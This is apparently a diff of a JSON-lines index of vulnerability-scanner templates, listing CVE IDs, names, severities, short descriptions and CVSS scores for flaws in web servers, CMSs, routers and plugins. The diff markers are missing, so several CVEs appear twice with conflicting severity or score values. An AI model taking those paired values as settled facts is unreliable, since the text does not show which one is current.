{"ID":"CVE-2015-7450","Info":{"Name":"IBM WebSphere Java Object Deserialization - Remote Code Execution","Severity":"critical","Description":"IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default).","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2015/CVE-2015-7450.yaml"}
{"ID":"CVE-2015-7780","Info":{"Name":"ManageEngine Firewall Analyzer \u003c8.0 - Local File Inclusion","Severity":"medium","Description":"ManageEngine Firewall Analyzer before 8.0 is vulnerable to local file inclusion.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2015/CVE-2015-7780.yaml"}
{"ID":"CVE-2015-7823","Info":{"Name":"Kentico CMS 8.2 - Open Redirect","Severity":"low","Description":"Kentico CMS 8.2 contains an open redirect vulnerability via GetDocLink.ashx with link variable. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2015/CVE-2015-7823.yaml"}
{"ID":"CVE-2015-7823","Info":{"Name":"Kentico CMS 8.2 - Open Redirect","Severity":"medium","Description":"Kentico CMS 8.2 contains an open redirect vulnerability via GetDocLink.ashx with link variable. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2015/CVE-2015-7823.yaml"}
{"ID":"CVE-2015-8349","Info":{"Name":"SourceBans \u003c2.0 - Cross-Site Scripting","Severity":"medium","Description":"SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-8349.yaml"}
{"ID":"CVE-2015-8399","Info":{"Name":"Atlassian Confluence \u003c5.8.17 - Information Disclosure","Severity":"medium","Description":"Atlassian Confluence before 5.8.17 contains an information disclsoure vulnerability. A remote authenticated user can read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-8399.yaml"}
{"ID":"CVE-2015-8813","Info":{"Name":"Umbraco \u003c7.4.0- Server-Side Request Forgery","Severity":"high","Description":"Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2015/CVE-2015-8813.yaml"}
@ -352,7 +352,7 @@
{"ID":"CVE-2016-4975","Info":{"Name":"Apache mod_userdir CRLF injection","Severity":"medium","Description":"Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-4975.yaml"}
{"ID":"CVE-2016-4977","Info":{"Name":"Spring Security OAuth2 Remote Command Execution","Severity":"high","Description":"Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2016/CVE-2016-4977.yaml"}
{"ID":"CVE-2016-5649","Info":{"Name":"NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure","Severity":"critical","Description":"NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-5649.yaml"}
{"ID":"CVE-2016-6195","Info":{"Name":"vBulletin \u003c= 4.2.3 - SQL Injection","Severity":"high","Description":"vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-6195.yaml"}
{"ID":"CVE-2016-6195","Info":{"Name":"vBulletin \u003c= 4.2.3 - SQL Injection","Severity":"critical","Description":"vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-6195.yaml"}
{"ID":"CVE-2016-6277","Info":{"Name":"NETGEAR Routers - Remote Code Execution","Severity":"high","Description":"NETGEAR routers R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly others allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2016/CVE-2016-6277.yaml"}
{"ID":"CVE-2016-6601","Info":{"Name":"ZOHO WebNMS Framework \u003c5.2 SP1 - Local File Inclusion","Severity":"high","Description":"ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2016/CVE-2016-6601.yaml"}
{"ID":"CVE-2016-7552","Info":{"Name":"Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass","Severity":"critical","Description":"Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-7552.yaml"}
@ -381,7 +381,7 @@
{"ID":"CVE-2017-12583","Info":{"Name":"DokuWiki - Cross-Site Scripting","Severity":"medium","Description":"DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-12583.yaml"}
{"ID":"CVE-2017-12611","Info":{"Name":"Apache Struts2 S2-053 - Remote Code Execution","Severity":"critical","Description":"Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1 uses an unintentional expression in a Freemarker tag instead of string literals, which makes it susceptible to remote code execution attacks.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-12611.yaml"}
{"ID":"CVE-2017-12615","Info":{"Name":"Apache Tomcat Servers - Remote Code Execution","Severity":"high","Description":"Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2017/CVE-2017-12615.yaml"}
{"ID":"CVE-2017-12617","Info":{"Name":"Apache Tomcat - Remote Code Execution","Severity":"high","Description":"When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2017/CVE-2017-12617.yaml"}
{"ID":"CVE-2017-12617","Info":{"Name":"Apache Tomcat - Remote Code Execution","Severity":"high","Description":"When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2017/CVE-2017-12617.yaml"}
{"ID":"CVE-2017-12629","Info":{"Name":"Apache Solr \u003c= 7.1 - XML Entity Injection","Severity":"critical","Description":"Apache Solr with Apache Lucene before 7.1 is susceptible to remote code execution by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-12629.yaml"}
{"ID":"CVE-2017-12635","Info":{"Name":"Apache CouchDB 1.7.0 / 2.x \u003c 2.1.1 - Remote Privilege Escalation","Severity":"critical","Description":"Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keysfor 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behavior that if two 'roles' keys are available in the JSON, the second one will be used for authorizing the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-12635.yaml"}
{"ID":"CVE-2017-12637","Info":{"Name":"SAP NetWeaver Application Server Java 7.5 - Local File Inclusion","Severity":"high","Description":"SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-12637.yaml"}
@ -677,7 +677,7 @@
{"ID":"CVE-2019-18957","Info":{"Name":"MicroStrategy Library \u003c11.1.3 - Cross-Site Scripting","Severity":"medium","Description":"MicroStrategy Library before 11.1.3 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-18957.yaml"}
{"ID":"CVE-2019-19134","Info":{"Name":"WordPress Hero Maps Premium \u003c=2.2.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-19134.yaml"}
{"ID":"CVE-2019-19368","Info":{"Name":"Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting","Severity":"medium","Description":"Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-19368.yaml"}
{"ID":"CVE-2019-1943","Info":{"Name":"Cisco Small Business 200,300 and 500 Series Switches - Open Redirect","Severity":"medium","Description":"Cisco Small Business 200,300 and 500 Series Switches contain an open redirect vulnerability in the Web UI. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"4.7"}},"file_path":"http/cves/2019/CVE-2019-1943.yaml"}
{"ID":"CVE-2019-1943","Info":{"Name":"Cisco Small Business 200,300 and 500 Series Switches - Open Redirect","Severity":"medium","Description":"Cisco Small Business 200,300 and 500 Series Switches contain an open redirect vulnerability in the Web UI. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-1943.yaml"}
{"ID":"CVE-2019-19781","Info":{"Name":"Citrix ADC and Gateway - Directory Traversal","Severity":"critical","Description":"Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-19781.yaml"}
{"ID":"CVE-2019-19824","Info":{"Name":"TOTOLINK Realtek SD Routers - Remote Command Injection","Severity":"high","Description":"TOTOLINK Realtek SDK based routers may allow an authenticated attacker to execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-19824.yaml"}
{"ID":"CVE-2019-19908","Info":{"Name":"phpMyChat-Plus 1.98 - Cross-Site Scripting","Severity":"medium","Description":"phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-19908.yaml"}
@ -696,7 +696,7 @@
{"ID":"CVE-2019-2729","Info":{"Name":"Oracle WebLogic Server Administration Console - Remote Code Execution","Severity":"critical","Description":"The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 0.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-2729.yaml"}
{"ID":"CVE-2019-2767","Info":{"Name":"Oracle Business Intelligence Publisher - XML External Entity Injection","Severity":"high","Description":"Oracle Business Intelligence Publisher is vulnerable to an XML external entity injection attack. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise BI Publisher.","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2019/CVE-2019-2767.yaml"}
{"ID":"CVE-2019-3396","Info":{"Name":"Atlassian Confluence Server - Path Traversal","Severity":"critical","Description":"The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-3396.yaml"}
{"ID":"CVE-2019-3398","Info":{"Name":"Atlassian Confluence Download Attachments - Remote Code Execution","Severity":"high","Description":"Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs or to create a new space or a personal space or who has 'Admin' permissions for a space can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2019/CVE-2019-3398.yaml"}
{"ID":"CVE-2019-3398","Info":{"Name":"Atlassian Confluence Download Attachments - Remote Code Execution","Severity":"high","Description":"Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs or to create a new space or a personal space or who has 'Admin' permissions for a space can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-3398.yaml"}
{"ID":"CVE-2019-3401","Info":{"Name":"Atlassian Jira \u003c7.13.3/8.0.0-8.1.1 - Incorrect Authorization","Severity":"medium","Description":"Atlasssian Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 is susceptible to incorrect authorization. The ManageFilters.jspa resource allows a remote attacker to enumerate usernames via an incorrect authorization check, thus possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2019/CVE-2019-3401.yaml"}
{"ID":"CVE-2019-3402","Info":{"Name":"Jira \u003c 8.1.1 - Cross-Site Scripting","Severity":"medium","Description":"Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-3402.yaml"}
{"ID":"CVE-2019-3403","Info":{"Name":"Jira - Incorrect Authorization","Severity":"medium","Description":"Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 is susceptible to an incorrect authorization check in the /rest/api/2/user/picker rest resource, enabling an attacker to enumerate usernames and gain improper access.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2019/CVE-2019-3403.yaml"}
@ -811,6 +811,7 @@
{"ID":"CVE-2020-17362","Info":{"Name":"Nova Lite \u003c 1.3.9 - Cross-Site Scripting","Severity":"medium","Description":"Nova Lite before 1.3.9 for WordPress is susceptible to reflected cross-site scripting via search.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-17362.yaml"}
{"ID":"CVE-2020-17453","Info":{"Name":"WSO2 Carbon Management Console \u003c=5.10 - Cross-Site Scripting","Severity":"medium","Description":"WSO2 Management Console through 5.10 is susceptible to reflected cross-site scripting which can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-17453.yaml"}
{"ID":"CVE-2020-17456","Info":{"Name":"SEOWON INTECH SLC-130 \u0026 SLR-120S - Unauthenticated Remote Code Execution","Severity":"critical","Description":"SEOWON INTECH SLC-130 and SLR-120S devices allow remote code execution via the ipAddr parameter to the system_log.cgi page.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-17456.yaml"}
{"ID":"CVE-2020-17463","Info":{"Name":"Fuel CMS 1.4.7 - SQL Injection","Severity":"high","Description":"FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-17463.yaml"}
{"ID":"CVE-2020-17496","Info":{"Name":"vBulletin 5.5.4 - 5.6.2- Remote Command Execution","Severity":"critical","Description":"vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-17496.yaml"}
{"ID":"CVE-2020-17505","Info":{"Name":"Artica Web Proxy 4.30 - OS Command Injection","Severity":"high","Description":"Artica Web Proxy 4.30 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-17505.yaml"}
{"ID":"CVE-2020-17506","Info":{"Name":"Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection","Severity":"critical","Description":"Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-17506.yaml"}
@ -883,7 +884,7 @@
{"ID":"CVE-2020-2733","Info":{"Name":"JD Edwards EnterpriseOne Tools 9.2 - Information Disclosure","Severity":"critical","Description":"JD Edwards EnterpriseOne Tools 9.2 is susceptible to information disclosure via the Monitoring and Diagnostics component. An attacker with network access via HTTP can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-2733.yaml"}
{"ID":"CVE-2020-27361","Info":{"Name":"Akkadian Provisioning Manager 4.50.02 - Sensitive Information Disclosure","Severity":"high","Description":"Akkadian Provisioning Manager 4.50.02 could allow viewing of sensitive information within the /pme subdirectories.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-27361.yaml"}
{"ID":"CVE-2020-27467","Info":{"Name":"Processwire CMS \u003c2.7.1 - Local File Inclusion","Severity":"high","Description":"Processwire CMS prior to 2.7.1 is vulnerable to local file inclusion because it allows a remote attacker to retrieve sensitive files via the download parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-27467.yaml"}
{"ID":"CVE-2020-27481","Info":{"Name":"Good Layers LMS Plugin \u003c= 2.1.4 - SQL Injection","Severity":"critical","Description":"An unauthenticated SQL Injection vulnerability in Good Layers LMS Plugin \u003c= 2.1.4 exists due to the usage of \"wp_ajax_nopriv\" call in WordPress, which allows any unauthenticated user to get access to the function \"gdlr_lms_cancel_booking\" where POST Parameter \"id\" was sent straight into SQL query without sanitization.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2020/CVE-2020-27481.yaml"}
{"ID":"CVE-2020-27481","Info":{"Name":"Good Layers LMS Plugin \u003c= 2.1.4 - SQL Injection","Severity":"critical","Description":"An unauthenticated SQL Injection vulnerability in Good Layers LMS Plugin \u003c= 2.1.4 exists due to the usage of \"wp_ajax_nopriv\" call in WordPress, which allows any unauthenticated user to get access to the function \"gdlr_lms_cancel_booking\" where POST Parameter \"id\" was sent straight into SQL query without sanitization.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-27481.yaml"}
{"ID":"CVE-2020-27735","Info":{"Name":"Wing FTP 6.4.4 - Cross-Site Scripting","Severity":"medium","Description":"Wing FTP 6.4.4 is vulnerable to cross-site scripting via its web interface because an arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-27735.yaml"}
{"ID":"CVE-2020-27866","Info":{"Name":"NETGEAR - Authentication Bypass","Severity":"high","Description":"NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers are vulnerable to authentication bypass vulnerabilities which could allow network-adjacent attackers to bypass authentication on affected installations.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-27866.yaml"}
{"ID":"CVE-2020-27982","Info":{"Name":"IceWarp WebMail 11.4.5.0 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp WebMail 11.4.5.0 is vulnerable to cross-site scripting via the language parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-27982.yaml"}
@ -1000,7 +1001,7 @@
{"ID":"CVE-2021-20323","Info":{"Name":"Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting","Severity":"medium","Description":"Keycloak 10.0.0 to 18.0.0 contains a cross-site scripting vulnerability via the client-registrations endpoint. On a POST request, the application does not sanitize an unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as HTML. This can be performed on any realm present on the Keycloak instance. Since the bug requires Content-Type application/json and is submitted via a POST, there is no common path to exploit that has a user impact.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-20323.yaml"}
{"ID":"CVE-2021-20792","Info":{"Name":"WordPress Quiz and Survey Master \u003c7.1.14 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Quiz and Survey Master plugin prior to 7.1.14 contains a cross-site scripting vulnerability which allows a remote attacker to inject arbitrary script via unspecified vectors.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-20792.yaml"}
{"ID":"CVE-2021-20837","Info":{"Name":"MovableType - Remote Command Injection","Severity":"critical","Description":"MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-20837.yaml"}
{"ID":"CVE-2021-21087","Info":{"Name":"Adobe ColdFusion - Remote Code Execution","Severity":"medium","Description":"Adobe ColdFusion is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2021/CVE-2021-21087.yaml"}
{"ID":"CVE-2021-21087","Info":{"Name":"Adobe ColdFusion - Cross-Site Scripting","Severity":"medium","Description":"Adobe Coldfusion versions 2016 (update 16 and earlier), 2018 (update 10 and earlier) and 2021.0.0.323925 are affected by an Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability. An attacker could abuse this vulnerability to execute arbitrary JavaScript code in context of the current user. Exploitation of this issue requires user interaction.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2021/CVE-2021-21087.yaml"}
{"ID":"CVE-2021-21234","Info":{"Name":"Spring Boot Actuator Logview Directory Traversal","Severity":"high","Description":"spring-boot-actuator-logview before version 0.2.13 contains a directory traversal vulnerability in libraries that adds a simple logfile viewer as a spring boot actuator endpoint (maven package \"eu.hinsch:spring-boot-actuator-logview\".\n","Classification":{"CVSSScore":"7.7"}},"file_path":"http/cves/2021/CVE-2021-21234.yaml"}
{"ID":"CVE-2021-21287","Info":{"Name":"MinIO Browser API - Server-Side Request Forgery","Severity":"high","Description":"MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability.","Classification":{"CVSSScore":"7.7"}},"file_path":"http/cves/2021/CVE-2021-21287.yaml"}
{"ID":"CVE-2021-21307","Info":{"Name":"Lucee Admin - Remote Code Execution","Severity":"critical","Description":"Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 contains an unauthenticated remote code execution vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-21307.yaml"}
@ -1120,7 +1121,7 @@
{"ID":"CVE-2021-25067","Info":{"Name":"Landing Page Builder \u003c 1.4.9.6 - Cross-Site Scripting","Severity":"medium","Description":"The Landing Page Builder WordPress plugin before 1.4.9.6 was affected by a reflected XSS in page-builder-add on the ulpb_post admin page.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2021/CVE-2021-25067.yaml"}
{"ID":"CVE-2021-25074","Info":{"Name":"WordPress WebP Converter for Media \u003c 4.0.3 - Unauthenticated Open Redirect","Severity":"medium","Description":"WordPress WebP Converter for Media \u003c 4.0.3 contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an open redirect issue.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25074.yaml"}
{"ID":"CVE-2021-25075","Info":{"Name":"WordPress Duplicate Page or Post \u003c1.5.1 - Cross-Site Scripting","Severity":"low","Description":"WordPress Duplicate Page or Post plugin before 1.5.1 contains a stored cross-site scripting vulnerability. The plugin does not have any authorization and has a flawed cross-site request forgery check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing unauthenticated users to call it and change the plugin's settings, or perform such attack via cross-site request forgery.\n","Classification":{"CVSSScore":"3.5"}},"file_path":"http/cves/2021/CVE-2021-25075.yaml"}
{"ID":"CVE-2021-25078","Info":{"Name":"Affiliates Manager \u003c 2.9.0 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not validate, sanitise and escape the IP address of requests logged by the click tracking feature, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against admin viewing the tracked requests.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-25078.yaml"}
{"ID":"CVE-2021-25078","Info":{"Name":"Affiliates Manager \u003c 2.9.0 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not validate, sanitise and escape the IP address of requests logged by the click tracking feature, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against admin viewing the tracked requests.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25078.yaml"}
{"ID":"CVE-2021-25085","Info":{"Name":"WOOF WordPress plugin - Cross-Site Scripting","Severity":"medium","Description":"The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25085.yaml"}
